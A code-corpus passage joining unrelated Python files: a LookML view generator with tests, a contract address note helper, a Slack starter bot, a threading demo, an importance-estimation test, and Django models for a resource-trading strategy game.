for (i = 0; i < dots.length; i++) {
dots[i].className = dots[i].className.replace(" active", "");
}
slides[slideIndex-1].style.display = "block";
dots[slideIndex-1].className += " active";
}
</script>
""" )
if __name__ == '__main__':
main ()
``` |
{
"source": "jimmyshah/lookml-gen2",
"score": 3
} |
#### File: lookml-gen2/lookmlgen/view.py
```python
import json
from collections import OrderedDict
try:
from textwrap import indent
except ImportError:
from .util import indent
from .base_generator import BaseGenerator
from .field import FieldType
class View(BaseGenerator):
"""Generates a LookML View
Initialize a View object with your parameters,
add Fields such as :class:`~lookmlgen.field.Dimension`,
:class:`~lookmlgen.field.Measure`,
:class:`~lookmlgen.field.DimensionGroup`, and
:class:`~lookmlgen.field.Filter`, and then
generate LookML for the view using :py:meth:`~View.generate_lookml`
:param name: Name of the view
:param label: Label to use for the view (may contain spaces)
:param sql_table_name: Name of the SQL table to use in the view
:param file: File handle of a file open for writing or a
StringIO object
:type name: string
:type label: string
:type sql_table_name: list of strings
:type file: File handle or StringIO object
"""
def __init__(self, name, label=None, sql_table_name=None, file=None):
super(View, self).__init__(file=file)
self.name = name
self.label = label
self.sql_table_name = sql_table_name
self.fields = OrderedDict()
self.derived_table = None
def generate_lookml(self, file=None, format_options=None):
""" Writes LookML for the view to a file or StringIO buffer.
:param file: File handle of a file open for writing or a
StringIO object
:param format_options: Formatting options to use during generation
:type file: File handle or StringIO object
:type format_options:
:class:`~lookmlgen.base_generator.GeneratorFormatOptions`
"""
if not file and not self.file:
raise ValueError('Must provide a file in either the constructor '
'or as a parameter to generate_lookml()')
f = file if file else self.file
fo = format_options if format_options else self.format_options
if fo.warning_header_comment:
f.write(fo.warning_header_comment)
f.write('view: {self.name} {{\n'.format(self=self))
if self.sql_table_name:
f.write('{indent}sql_table_name: {self.sql_table_name} ;;\n'.
format(indent=' ' * fo.indent_spaces, self=self))
if self.label:
f.write('{indent}label: "{self.label}"\n'.
format(indent=' ' * fo.indent_spaces, self=self))
if fo.newline_between_items:
f.write('\n')
if self.derived_table:
self.derived_table.generate_lookml(file=f, format_options=fo)
if fo.newline_between_items:
f.write('\n')
if fo.view_fields_alphabetical:
self.__ordered_fields = sorted(self.fields.items())
else:
self.__ordered_fields = self.fields.items()
self.__generated_fields = []
self._gen_fields(f, fo, [FieldType.FILTER])
self._gen_fields(f, fo, [FieldType.DIMENSION, FieldType.DIMENSION_GROUP])
self._gen_fields(f, fo, [FieldType.MEASURE])
f.write('}\n')
return
def add_field(self, field):
"""Adds a :class:`~lookmlgen.field.Field` object to a :class:`View`"""
self.fields[field.name] = field
return
def set_derived_table(self, derived_table):
"""Adds a :class:`~lookmlgen.view.DerivedTable` object to a
:class:`View`
"""
self.derived_table = derived_table
def _gen_fields(self, f, fo, field_types):
for k, d in self.__ordered_fields:
if d.field_type not in field_types:
continue
if len(self.__generated_fields) != 0 and fo.newline_between_items:
f.write('\n')
d.generate_lookml(file=f, format_options=fo)
self.__generated_fields.append(d)
class DerivedTable(BaseGenerator):
"""Generates the LookML View parameters to support derived
tables, including persistent derived tables (PDTs).
:param sql: SQL statement to execute
:param sql_trigger_value: SQL to determine when to trigger build
:param indexes: List of column names to use as indexes
:param file: File handle of a file open for writing or a StringIO object
:type sql: string
:type sql_trigger_value: string
:type indexes: list of strings
:type file: File handle or StringIO object
"""
def __init__(self, sql, sql_trigger_value=None, indexes=None, file=None):
super(DerivedTable, self).__init__(file=file)
self.sql = sql
self.sql_trigger_value = sql_trigger_value
self.indexes = indexes
def generate_lookml(self, file=None, format_options=None):
""" Writes LookML for a derived table to a file or StringIO buffer.
:param file: File handle of a file open for writing or a
StringIO object
:param format_options: Formatting options to use during generation
:type file: File handle or StringIO object
:type format_options:
:class:`~lookmlgen.base_generator.GeneratorFormatOptions`
"""
if not file and not self.file:
raise ValueError('Must provide a file in either the constructor '
'or as a parameter to generate_lookml()')
f = file if file else self.file
fo = format_options if format_options else self.format_options
f.write('{indent}derived_table: {{\n'.
format(indent=' ' * fo.indent_spaces))
if self.sql:
final_sql = ' ' + self.sql if '\n' not in self.sql \
else '\n' + indent(self.sql, ' ' * 3 * fo.indent_spaces)
f.write('{indent}sql:{sql} ;;\n'.
format(indent=' ' * 2 * fo.indent_spaces, sql=final_sql))
if self.sql_trigger_value:
f.write('{indent}sql_trigger_value: '
'{self.sql_trigger_value} ;;\n'.
format(indent=' ' * 2 * fo.indent_spaces, self=self))
if self.indexes:
f.write('{indent}indexes: {indexes}\n'.
format(indent=' ' * 2 * fo.indent_spaces,
indexes=json.dumps(self.indexes)))
f.write('{indent}}}\n'.format(indent=' ' * fo.indent_spaces))
```
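A minimal usage sketch of the `View`/`DerivedTable` workflow described in the docstrings above, assuming Python 3 and the `lookmlgen` field and format classes that the tests below exercise; it is illustrative only, not part of the repository:
```python
import io

from lookmlgen import view, field
from lookmlgen.base_generator import GeneratorFormatOptions

# Build a view backed by a SQL table, add a dimension and a measure,
# then render the LookML into an in-memory buffer.
v = view.View('orders', sql_table_name='analytics.orders')
v.add_field(field.Dimension('id', type='number', primary_key=True))
v.add_field(field.Measure('sum_amount', sql='${TABLE}.amount', type='sum'))

buf = io.StringIO()
v.generate_lookml(file=buf,
                  format_options=GeneratorFormatOptions(warning_header_comment=None))
print(buf.getvalue())  # roughly: view: orders { sql_table_name: analytics.orders ;; ... }
```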
#### File: lookml-gen2/tests/test_view.py
```python
import os
import six
from lookmlgen import view
from lookmlgen import field
from lookmlgen import base_generator
test_format_options = base_generator.\
GeneratorFormatOptions(warning_header_comment=None)
def test_basic_view():
testname = 'basic_view'
v = view.View(testname)
v.add_field(field.Dimension('dimension1', sql='${TABLE}.dim1'))
f = six.StringIO()
v.generate_lookml(f, format_options=test_format_options)
lookml = f.getvalue()
with open(os.path.join(os.path.dirname(__file__),
'expected_output/%s.lkml' % testname),
'rt') as expected:
assert lookml == expected.read()
def test_pdt_view():
testname = 'pdt_view'
pdt = view.DerivedTable(sql="SELECT id, count(*) c FROM table GROUP BY id",
sql_trigger_value='DATE()',
indexes=['id'])
v = view.View(testname)
v.derived_table = pdt
v.add_field(field.Dimension('id', type='number',
primary_key=True))
v.add_field(field.Dimension('c', type='number'))
v.add_field(field.Measure('sum_c', sql='${TABLE}.c', type='sum'))
f = six.StringIO()
v.generate_lookml(f, format_options=test_format_options)
lookml = f.getvalue()
six.print_(lookml)
with open(os.path.join(os.path.dirname(__file__),
'expected_output/%s.lkml' % testname),
'rt') as expected:
assert lookml == expected.read()
def test_dimension_group():
testname = 'dimension_group_test'
v = view.View(testname)
v.add_field(field.DimensionGroup('dimension1', sql='${TABLE}.dim1'))
f = six.StringIO()
v.generate_lookml(f, format_options=test_format_options)
lookml = f.getvalue()
six.print_(lookml)
with open(os.path.join(os.path.dirname(__file__),
'expected_output/%s.lkml' % testname),
'rt') as expected:
assert lookml == expected.read()
def test_dimension_group_no_timeframes():
testname = 'dimension_group_no_timeframes_test'
v = view.View(testname)
v.add_field(field.DimensionGroup('dimension1', sql='${TABLE}.dim1'))
f = six.StringIO()
fo_omit_timeframes = base_generator.\
GeneratorFormatOptions(warning_header_comment=None, omit_time_frames_if_not_set=True)
v.generate_lookml(f, format_options=fo_omit_timeframes)
lookml = f.getvalue()
six.print_(lookml)
with open(os.path.join(os.path.dirname(__file__),
'expected_output/%s.lkml' % testname),
'rt') as expected:
assert lookml == expected.read()
def test_newlines():
testname = 'newlines_test'
v = view.View(testname)
for l in ['a', 'b', 'c', 'd']:
v.add_field(field.Dimension(l, type='number'))
v.add_field(field.Measure('sum_' + l, type='sum', sql='${{{0}}}'.format(l)))
f = six.StringIO()
v.generate_lookml(f, format_options=test_format_options)
lookml = f.getvalue()
six.print_(lookml)
with open(os.path.join(os.path.dirname(__file__),
'expected_output/%s.lkml' % testname),
'rt') as expected:
assert lookml == expected.read()
``` |
{
"source": "JimmyShi22/python-sdk",
"score": 2
} |
#### File: python-sdk/client/contractnote.py
```python
from client_config import client_config
from configobj import ConfigObj
class ContractNote:
@staticmethod
def get_last(name):
config = ConfigObj(client_config.contract_info_file, encoding='UTF8')
if name in config["address"]:
address = config["address"][name]
else:
address = None
return address
@staticmethod
def save_address(contractname, newaddress, blocknum=None, memo=None):
from configobj import ConfigObj
import time
#write to file
config = ConfigObj(client_config.contract_info_file,
encoding='UTF8')
if 'address' not in config:
#print("address not in config",config)
config['address']={}
config['address'][contractname] = newaddress
#print (config)
        if blocknum is not None:
            if "history" not in config:
                config["history"] = {}
            timestr = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
            detail = "{}:{},block:{}".format(contractname, timestr, blocknum)
            if memo is not None:
                detail = "{},{}".format(detail, memo)
config["history"][newaddress] = detail
config.write()
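

# Hedged usage sketch (not part of the original module). It round-trips a
# contract address through the file named by client_config.contract_info_file;
# the address and block number below are invented placeholders.
if __name__ == "__main__":
    ContractNote.save_address("HelloWorld", "0x2d1c577e41809453c50e7e5c3f57d06f3cdd90ce",
                              blocknum=123, memo="demo deployment")
    print(ContractNote.get_last("HelloWorld"))  # prints the address saved above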
``` |
{
"source": "JimmyShi22/WorkSpace",
"score": 3
} |
#### File: codes/chatbot/startbot.py
```python
import os
import time
from slackclient import SlackClient
# The starterbot's ID, read from an environment variable
BOT_ID = os.environ.get("BOT_ID")
# Constants
AT_BOT = "<@" + BOT_ID + ">"
EXAMPLE_COMMAND = "do"
# Instantiate the Slack and Twilio clients
slack_client = SlackClient(os.environ.get('SLACK_BOT_TOKEN'))
def handle_command(command, channel):
"""
Receives commands directed at the bot and determines if they
are valid commands. If so, then acts on the commands. If not,
returns back what it needs for clarification.
"""
response = "Not sure what you mean. Use the *" + EXAMPLE_COMMAND + \
"* command with numbers, delimited by spaces."
if command.startswith(EXAMPLE_COMMAND):
response = "Sure...write some more code then I can do that!"
slack_client.api_call("chat.postMessage", channel=channel,
text=response, as_user=True)
def parse_slack_output(slack_rtm_output):
"""
The Slack Real Time Messaging API is an events firehose.
this parsing function returns None unless a message is
directed at the Bot, based on its ID.
"""
output_list = slack_rtm_output
if output_list and len(output_list) > 0:
for output in output_list:
if output and 'text' in output and AT_BOT in output['text']:
                # Return the text after the @ mention, with whitespace stripped
return output['text'].split(AT_BOT)[1].strip().lower(), \
output['channel']
return None, None
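
# Hedged illustration (not part of the original bot): given an RTM event whose
# text mentions the bot, parse_slack_output() strips the mention and returns
# the lower-cased command plus the channel; any other event yields (None, None).
# The channel ID below is an invented placeholder.
def _parse_slack_output_example():
    sample_events = [{'text': AT_BOT + ' DO something', 'channel': 'C0PLACEHOLDER'}]
    return parse_slack_output(sample_events)  # -> ('do something', 'C0PLACEHOLDER')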
if __name__ == "__main__":
READ_WEBSOCKET_DELAY = 1 # 1 second delay between reading from firehose
if slack_client.rtm_connect():
print("StarterBot connected and running!")
while True:
command, channel = parse_slack_output(slack_client.rtm_read())
if command and channel:
handle_command(command, channel)
time.sleep(READ_WEBSOCKET_DELAY)
else:
print("Connection failed. Invalid Slack token or bot ID?")
``` |
{
"source": "jimmysitu/pyMultiThreadTest",
"score": 3
} |
#### File: jimmysitu/pyMultiThreadTest/multiThreadTest.py
```python
import threading
import queue
import time
class testThread(threading.Thread):
def __init__(self, thId):
threading.Thread.__init__(self)
self.thId = thId
def run(self):
print("Thread %d started" % self.thId)
while not exitFlag:
qLock.acquire()
if not jobQueue.empty():
job = jobQueue.get()
qLock.release()
print("Thread %d get job: %d" % (self.thId, job))
else:
print("Thread %d idle" % (self.thId))
qLock.release()
time.sleep(1)
print("Thread %d end" % self.thId)
if __name__ == "__main__":
threads = []
exitFlag = 0
qLock = threading.Lock()
jobQueue = queue.Queue()
for i in range(6):
thd = testThread(i)
thd.start()
threads.append(thd)
qLock.acquire()
for j in range(0, 1000):
jobQueue.put(j+10000)
qLock.release()
    # Queue.empty() is not a reliable way to synchronize processes/threads.
    # Sleep for a while here for safety.
time.sleep(1)
while not jobQueue.empty():
pass
exitFlag = 1
for thd in threads:
thd.join()
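
    # Hedged side note (not in the original script): queue.Queue also supports a
    # task_done()/join() protocol; having each worker call jobQueue.task_done()
    # after processing an item and the main thread call jobQueue.join() would
    # avoid polling empty() with sleeps, which the comment above flags as unreliable.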
``` |
{
"source": "jimmyskull/covariate-shift-adaptation",
"score": 3
} |
#### File: pantaray/test/test_importance.py
```python
import unittest
import numpy as np
from numpy.random import shuffle
from sklearn.datasets import load_digits
from sklearn.linear_model import LogisticRegression
from sklearn.exceptions import NotFittedError
from pantaray.importance_estimation import PCIF
class ImportanceTest(unittest.TestCase):
def setUp(self):
data, target = load_digits(return_X_y=True)
index_0to4 = np.where(target <= 4)[0]
index_5to9 = np.where(target > 4)[0]
shuffle(index_0to4)
shuffle(index_5to9)
# 75% of 0-4 and 25% of 5-9 in the train set.
# 25% of 0-4 and 75% of 5-9 in the test set.
first, second = int(len(index_0to4) * 0.75), int(len(index_5to9) * 0.25)
train = np.concatenate((index_0to4[:first], index_5to9[:second]))
test = np.concatenate((index_0to4[first:], index_5to9[second:]))
# Put results as instance attributes.
        self.X_train, self.y_train = data[train], target[train]
        self.X_test, self.y_test = data[test], target[test]
def test_something(self):
X_train, X_test = self.X_train, self.X_test
pcif = PCIF()
pcif.fit(X_train, X_test, LogisticRegression())
w_train = pcif.predict(X_train)
w_test = pcif.predict(X_test)
print(w_train.mean())
print(w_test.mean())
def test_error_predict_without_fit(self):
X_train, X_test = self.X_train, self.X_test
pcif = PCIF()
with self.assertRaises(NotFittedError):
w_train = pcif.predict(X_train)
``` |
{
"source": "jimmyskull/ironandblood",
"score": 3
} |
#### File: ironandblood/game/config.py
```python
import datetime
class Config:
# Initial date in game-time
start_epoch = datetime.datetime(1800, 1, 31, 0, 0, 0)
# Initial date in real-time
start_date = datetime.datetime(2016, 3, 31, 0, 0, 0)
@staticmethod
def current_game_date():
return Config.to_game_date(datetime.datetime.now())
@staticmethod
def to_game_date(date):
"""
Returns the game-time date.
1 turn = 1 game-time year = 1 real-time day.
"""
seconds = (date - Config.start_date).total_seconds()
    norm = 0.004224537037037037  # game-days per real-second: 365 / 86400
return Config.start_epoch + datetime.timedelta(days = seconds * norm)
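

# Hedged worked example (not part of the original file), using the constants
# above: one real-time day after start_date maps to one game-time year.
if __name__ == "__main__":
  one_real_day_later = Config.start_date + datetime.timedelta(days=1)
  print(Config.current_game_date())              # whatever "now" maps to in game time
  print(Config.to_game_date(Config.start_date))  # 1800-01-31 00:00:00
  print(Config.to_game_date(one_real_day_later)) # ~1801-01-31, one game year later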
```
#### File: ironandblood/game/models.py
```python
from django.contrib.auth.models import User
from django.core.exceptions import ValidationError
from django.db import models, transaction
from django.db.models import Sum
from django.utils import timezone
from django.utils.translation import ugettext as _
class Resources(models.Model):
currency = models.IntegerField('Currency', default=0)
manufactured = models.IntegerField('Manufactured Goods', default=0)
agricultural = models.IntegerField('Agricultural Goods', default=0)
_list = ['currency', 'manufactured', 'agricultural']
_colors = {
'currency': '#c2a91b',
'manufactured': '#34495E',
'agricultural': '#007733'
}
_sparkline_colors = {
'currency': '#18ff00',
'manufactured': '#0096ff',
'agricultural': '#ffea00'
}
# ['#18ff00', '#0096ff', '#ffea00']
# ['#c2a91b', '#34495E', '#007733']
def __str__(self):
"""
Returns a list of nonzero resource quantities.
"""
nonzero = list()
for name in self._list:
quantity = getattr(self, name)
if quantity != 0:
nonzero.append('{}={}'.format(name, quantity))
return ', '.join(nonzero)
def _update(self, other, fn):
"""
Update all fields calling self.field = fn(self.field, other.field)
"""
for name in self._list:
setattr(self, name, fn(getattr(self, name), getattr(other, name)))
def as_list(self):
return [getattr(self, name) for name in self._list]
@staticmethod
def color(name):
return Resources._colors[name]
@staticmethod
def colors_as_str_list():
return list(map(str, Resources._sparkline_colors.values()))
def has_currency(self):
return self.currency > 0
def has_agricultural(self):
return self.agricultural > 0
def has_manufactured(self):
return self.manufactured > 0
def add(self, other):
"""
Changes `self` by adding values from `other`.
"""
self._update(other, lambda a, b: a + b)
def covers(self, other):
"""
True if `self` has at least the same amount of resources in `other`.
"""
return all([getattr(self, i) >= getattr(other, i) for i in self._list])
def subtract(self, other):
"""
Changes `self` by subtracting values from `other`.
"""
self._update(other, lambda a, b: a - b)
def is_empty(self):
"""Return if all values are zero"""
return all([getattr(self, i) == 0 for i in self._list])
def is_zero_or_positive(self):
"""Return if all values are zero or positive"""
return all([getattr(self, i) >= 0 for i in self._list])
class Player(models.Model):
"""
Player information
Roles
=====
* **Privateer** Player with no territories or charters
* **Chartered company** Player with charters
* **Head of State** Player that owns one or more territories
Credit Quality
==============
The player’s delinquency rate affects some macroeconomic factors:
* economic output
* unemployment
* inflation
* investments (by gaming dynamics, since credit quality is public).
Note: in real life, the credit quality is determined by the other way around,
and here we use the performance of a player to determine those features.
"""
user = models.OneToOneField(User, on_delete=models.CASCADE,
related_name='player')
resources = models.OneToOneField(Resources, on_delete=models.CASCADE)
delinquency = models.IntegerField(
'Delinquent bonds',
default=0,
help_text=("Number of delinquent bonds as creditor. The rate of "
"delinquency (delinquent bonds over total paid bonds) affects the "
"credit quality of the player."))
@classmethod
def create_player(cls, user):
res = Resources()
res.save()
return cls(user=user, resources=res)
def territories(self):
"""List of territories controlled by the player"""
return Territory.objects.filter(owner=self.user)
def charter(self):
"""List of active charters to the player"""
return Charter.objects.filter(member=self.user)
def is_privateer(self):
"""True if the player is currently a Privateer"""
return len(self.territories()) == 0 and len(self.charter()) == 0
def is_chartered_company(self):
"""True if the player is currently a Chartered Company"""
return len(self.territories()) == 0 and len(self.charter()) >= 1
def is_head_of_state(self):
"""True if the player is currently a Head of State"""
return len(self.territories()) >= 1
class Territory(models.Model):
"""Territory information"""
owner = models.ForeignKey(User, null=True, blank=True)
code = models.CharField(max_length=16, blank=False)
name = models.CharField(max_length=32, blank=False)
land_area = models.IntegerField('Land area', default=100)
def __str__(self):
return 'name={}, area={}'.format(self.name, self.land_area)
class Charter(models.Model):
territory = models.ForeignKey(Territory, blank=False)
member = models.ForeignKey(User, blank=False)
size = models.IntegerField('Land area percentage', default=10)
@staticmethod
def _validate_size(size):
if size <= 0 or size > 100:
raise ValidationError(
_("Grant size of %(grant_size)d%% is not within the range 1%%–100%%."),
params={
'grant_size': size
})
@staticmethod
def _check_leaser_controls_territory(territory, leaser):
if territory.owner != leaser:
raise ValidationError(
_("%(player)s does not currently control “%(territory)s”."),
params={
'player': leaser.username,
'territory': territory.name
})
@staticmethod
def _check_if_member_already_has_charter(territory, member):
if Charter.objects.filter(territory=territory, member=member):
raise ValidationError(
_("%(player)s already has a charter in “%(territory)s”."),
params={
'player': member.username,
'territory': territory.name
})
@staticmethod
def _check_territory_not_full(territory, member, size):
allotted = Charter.objects.filter(territory=territory)
allotted = allotted.aggregate(Sum('size'))['size__sum']
if allotted is None:
allotted = 0
free = 100 - allotted
if free < size:
raise ValidationError(
_("“%(territory)s” has %(free)d%% of its land area available. "
"Trying to grant %(grant_size)d%% of land."),
params={
'territory': territory.name,
'free': free,
'grant_size': size
})
@classmethod
def grant(cls, leaser, territory, member, size):
"""
Grants `size` percent of the `territory`’s land area to `member`.
* `leaser` must control `territory`
* The sum of all charters in the `territory` cannot pass 100%
* `member` cannot already have a charter in the territory.
"""
cls._validate_size(size=size)
cls._check_leaser_controls_territory(territory=territory, leaser=leaser)
cls._check_if_member_already_has_charter(territory=territory, member=member)
cls._check_territory_not_full(territory=territory, member=member, size=size)
return cls(territory=territory, member=member, size=size)
class Bond(models.Model):
"""Bond is a debt investment in which an `issuer` loans `resource` to a
`creditor`. The creditor agrees to pay the debt in up to `maturity_date`
turns, except if the bond is a Perpetual Bond (`maturity_date` == 0).
If not paid, `creditor` increases his delinquency."""
PENDING = 'W'
PAID = 'P'
FORGIVEN = 'F'
BOND_STATE = (
(PENDING, 'Pending'),
(PAID, 'Paid'),
(FORGIVEN, 'Forgiven'),
)
# Holder is the player that will receive the payment
holder = models.ForeignKey(User, related_name='+')
# Borrower is the player that can either pay to he holder or
# exchange the bond with a third player.
borrower = models.ForeignKey(User, related_name='+')
resources = models.ForeignKey(Resources, null=True, blank=True,
related_name='+')
territory = models.ForeignKey(Territory, null=True, blank=True,
related_name='+')
origin_exchange = models.ForeignKey('game.Exchange', null=True, blank=True,
related_name='+')
payment_exchange = models.ForeignKey('game.Exchange', null=True, blank=True,
related_name='+')
maturity = models.IntegerField(default=0)
state = models.CharField(max_length=1, choices=BOND_STATE, default=PENDING)
def __str__(self):
ret = ["pk={}, state={}, holder={}, borrower={}".format(self.pk,
self.get_state_display(), self.holder, self.borrower)]
if self.resources:
ret.append(", resources=<{}>".format(self.resources))
if self.territory:
ret.append(", territory=<{}>").format(self.territory)
return ''.join(ret)
def _check_user_is_holder(self, user):
if self.holder and user != self.holder:
raise ValidationError(_("“%(player)s” is not the holder of this bond."),
params={
'player': user.username
})
def _check_user_is_borrower(self, user):
if self.borrower and user != self.borrower:
raise ValidationError(
_("“%(player)s” is not the borrower of this bond."),
params={
'player': user.username
})
def _check_state_pending(self):
if self.state != self.PENDING:
raise ValidationError(_("This bond is not pending."))
def forgive(self, user):
self._check_user_is_holder(user=user)
self._check_state_pending()
self.state = self.FORGIVEN
self.save()
return True
def pay(self, user):
self._check_user_is_borrower(user=user)
self._check_state_pending()
exchange = Exchange(offeror=self.borrower,
offeror_resources=self.resources,
offeror_territory=self.territory,
offeree=self.holder)
exchange.offer(user=user)
exchange.accept(user=self.holder)
self.payment_exchange = exchange
self.state = self.PAID
self.save()
return True
def is_payable(self, borrower=None):
if borrower is None:
borrower = self.borrower
exchange = Exchange(offeror=borrower,
offeror_resources=self.resources,
offeror_territory=self.territory,
offeree=self.holder)
exchange.state = Exchange.WAITING
return exchange.is_acceptable()
def is_pending(self):
return self.state == self.PENDING
def is_paid(self):
return self.state == self.PAID
def is_forgiven(self):
return self.state == self.FORGIVEN
def includes_currency(self):
return self.includes_resources() and self.resources.has_currency()
def includes_agricultural(self):
return self.includes_resources() and self.resources.has_agricultural()
def includes_manufactured(self):
return self.includes_resources() and self.resources.has_manufactured()
def includes_resources(self):
return self.resources and not self.resources.is_empty()
def includes_territory(self):
return self.territory is not None
def get_creation_date(self):
return self.origin_exchange.answer_date
def get_payment_date(self):
return self.payment_exchange.answer_date
class Exchange(models.Model):
"""
Exchange Trading System
Exchange is the way to trade resources between two players.
Exchange mechanism
------------------
Exchange operations allow complex transactions with some level of guarantee
for the two players.
Barter
Exchange of goods, without using money.
Donation
Send goods, money, or territories to the other player. Or ask for donation.
Payment
Offer goods for money.
Bond (debts)
Exchange bonds directly between players (pass responsibility of payment
to the other player, keeping the original bond lender).
Complex operations
One can mix goods, money, territories and even a bond (debt) in a single
exchange operation.
Events associated with an exchange
----------------------------------
Offering
An offeror prepares an exchange, setting resources to be
sent and resources to be received from the offeree player.
While not accepted/rejected, the resources to be sent to offeree is held
to guarantee the exchange success in case of agreement.
**Note** Territories are not held while waiting for response. That is,
the player can offer the same territory to many users, and the first one
to accept will get the ownership.
Waiting response
The offeree player receives the exchange proposal.
Offeree accepts
Resources are finally exchanged and the negotiation ends.
Offeree rejects
Offeror resources are released and the exchange is canceled.
Offeror cancels
    Offeror cancels the exchange proposal and his resources are released.
"""
UNKNOWN = 'U'
WAITING = 'W'
ACCEPTED = 'A'
REJECTED = 'R'
CANCELED = 'C'
NEGOTIATION_STATE = (
(UNKNOWN, 'Unknown'),
(WAITING, 'Waiting'),
(ACCEPTED, 'Accepted'),
(REJECTED, 'Rejected'),
(CANCELED, 'Canceled'),
)
offeror = models.ForeignKey(User, related_name='+')
offeror_resources = models.ForeignKey(Resources, null=True,
related_name='+')
offeror_territory = models.ForeignKey(Territory, null=True, blank=True,
related_name='+')
offeror_bond = models.ForeignKey(Bond, null=True, blank=True,
related_name='+')
offeror_as_bond = models.BooleanField(default=False)
offeror_as_bond_maturity = models.IntegerField(default=0)
offeree = models.ForeignKey(User, related_name='+')
offeree_resources = models.ForeignKey(Resources, null=True,
related_name='+')
offeree_territory = models.ForeignKey(Territory, null=True, blank=True,
related_name='+')
offeree_bond = models.ForeignKey(Bond, null=True, blank=True,
related_name='+')
offeree_as_bond = models.BooleanField(default=False)
offeree_as_bond_maturity = models.IntegerField(default=0)
state = models.CharField(max_length=1, choices=NEGOTIATION_STATE,
default=UNKNOWN)
offer_date = models.DateTimeField(null = True, blank = True)
answer_date = models.DateTimeField(null = True, blank = True)
def __str__(self):
ret = ["pk={}, state={}".format(self.pk, self.get_state_display())]
if self.offeror:
ret.append(", (offeror={}".format(self.offeror))
if self.offeror_resources:
ret.append(", resources=<{}>".format(self.offeror_resources))
if self.offeror_territory:
ret.append(", territory=<{}>".format(self.offeror_territory))
if self.offeror_bond:
ret.append(", bond=<{}>".format(self.offeror_bond))
if self.offeror_as_bond:
ret.append(", as_bond")
ret.append(")")
else:
ret.append(", no offeror")
if self.offeree:
ret.append(", (offeree={}".format(self.offeree))
if self.offeree_resources:
ret.append(", resources=<{}>".format(self.offeree_resources))
if self.offeree_territory:
ret.append(", territory=<{}>".format(self.offeree_territory))
if self.offeree_bond:
ret.append(", bond=<{}>".format(self.offeree_bond))
if self.offeree_as_bond:
ret.append(", as_bond")
ret.append(")")
else:
ret.append(", no offeree")
return ''.join(ret)
def save(self, *args, **kwargs):
if self.offeror_resources:
self.offeror_resources.save()
if self.offeree_resources:
self.offeree_resources.save()
super(Exchange, self).save(*args, **kwargs)
def _offeror_has_resources(self):
return not (self.offeror_resources is None or \
self.offeror_resources.is_empty())
def _offeree_has_resources(self):
return not (self.offeree_resources is None or \
self.offeree_resources.is_empty())
def _validate_bond(self):
# We must refuse Bond exchanges with their holders, because currently
# there is no way to perform a safe transaction.
# Example: offeror Bond payment would be ok, but if offeree Bond, then
# we would have to undo the first payment.
if (self.offeror_bond is not None and self.offeror_as_bond) or \
(self.offeree_bond is not None and self.offeree_as_bond):
raise ValidationError(_("Cannot build a Bond of Bond."))
if self.offeror_bond:
if self.offeror_bond.borrower != self.offeror:
raise ValidationError(
_("“%(player)s” is not the borrower of this Bond."),
params={
'player': self.offeror.username
})
if self.offeror_bond.holder == self.offeree:
raise ValidationError(
_("Cannot exchange a Bond with its holder. "
"To pay the bond, use the payment section."))
if self.offeror_bond.state != self.offeror_bond.PENDING:
raise ValidationError(_("This Bond is not pending."))
if self.offeree_bond:
if self.offeree_bond.borrower != self.offeree:
raise ValidationError(
_("“%(player)s” is not the holder of this Bond."),
params={
'player': self.offeree.username
})
if self.offeree_bond.holder == self.offeror:
raise ValidationError(
_("Cannot exchange a Bond with its holder."))
if self.offeree_bond.state != self.offeree_bond.PENDING:
raise ValidationError(_("This Bond is not pending."))
def _validate_territory_ownership(self):
"""Applicable before accept"""
if not self.offeror_as_bond and self.offeror_territory:
if self.offeror_territory.owner != self.offeror:
raise ValidationError(
_("Offeror “%(player)s” does not control “%(territory)s”."),
params={
'player': self.offeror.username,
'territory': self.offeror_territory.name
})
if not self.offeree_as_bond and self.offeree_territory:
if self.offeree_territory.owner != self.offeree:
raise ValidationError(
_("Offeree “%(player)s” does not control “%(territory)s”."),
params={
'player': self.offeree.username,
'territory': self.offeree_territory.name
})
def _validate_resource_sufficiency(self):
if not self.offeree_as_bond and self._offeree_has_resources():
if not self.offeree.player.resources.covers(self.offeree_resources):
raise ValidationError(
_("Offeree “%(player)s” lack resources to accept this exchange."),
params={
'player': self.offeree.username
})
if self.state == self.UNKNOWN:
if not self.offeror_as_bond and self._offeror_has_resources():
if not self.offeror.player.resources.covers(self.offeror_resources):
raise ValidationError(
_("Offeror “%(player)s” lack resources to offer this exchange."),
params={
'player': self.offeror.username
})
def _check_if_empty(self):
if not self._offeror_has_resources() and \
not self._offeree_has_resources() and \
self.offeror_territory is None and \
self.offeree_territory is None and \
self.offeror_bond is None and \
self.offeree_bond is None:
raise ValidationError(_("Empty exchange."))
def _validate_user_as_offeror(self, user):
if self.offeror and user != self.offeror:
raise ValidationError(
_("“%(player)s” is not the offeror of this exchange."),
params={
'player': user.username
})
def _validate_user_as_offeree(self, user):
if self.offeree and user != self.offeree:
raise ValidationError(
_("“%(player)s” is not the offeree of this exchange."),
params={
'player': user.username
})
def offer(self, user):
"""
Offeror `user` sends the exchange proposal.
Collect resources from `offeror` to prepare for transaction.
We do not reserve resources of `offeree` because he is still not aware
of this exchange.
"""
self._validate_user_as_offeror(user=user)
if self.state != self.UNKNOWN:
raise ValidationError(_("This exchange cannot be offered."))
if self.offeror == self.offeree:
raise ValidationError(_("Offeror and offeree cannot be the same."))
self._check_if_empty()
self._validate_bond()
#self._validate_territory_ownership()
self._validate_resource_sufficiency()
if not self.offeror_as_bond and self._offeror_has_resources():
self.offeror.player.resources.subtract(self.offeror_resources)
self.state = self.WAITING
self.offer_date = timezone.now()
self.save()
return True
def is_acceptable(self):
try:
if self.state != self.WAITING:
raise ValidationError(_("This exchange is not waiting for response."))
self._validate_bond()
self._validate_territory_ownership()
self._validate_resource_sufficiency()
except:
return False
return True
def could_offeror_pay_offeree_bond(self):
return self.offeree_bond.is_payable(borrower = self.offeror)
def could_offeree_pay_offeror_bond(self):
return self.offeror_bond.is_payable(borrower = self.offeree)
@transaction.atomic
def accept(self, user):
"""
Offeree `user` accepts the exchange. Resources are finally exchanged.
"""
self._validate_user_as_offeree(user=user)
if self.state != self.WAITING:
raise ValidationError(_("This exchange is not waiting for response."))
self._validate_bond()
self._validate_territory_ownership()
self._validate_resource_sufficiency()
# Execute transactions after checking everything
if self.offeror_as_bond:
bond = Bond(borrower=self.offeror, holder=self.offeree,
resources=self.offeror_resources,
territory=self.offeror_territory,
origin_exchange=self,
maturity=self.offeror_as_bond_maturity)
bond.save()
else:
if self._offeror_has_resources():
self.offeree.player.resources.add(self.offeror_resources)
if self.offeror_territory:
self.offeror_territory.owner = self.offeree
self.offeror_territory.save()
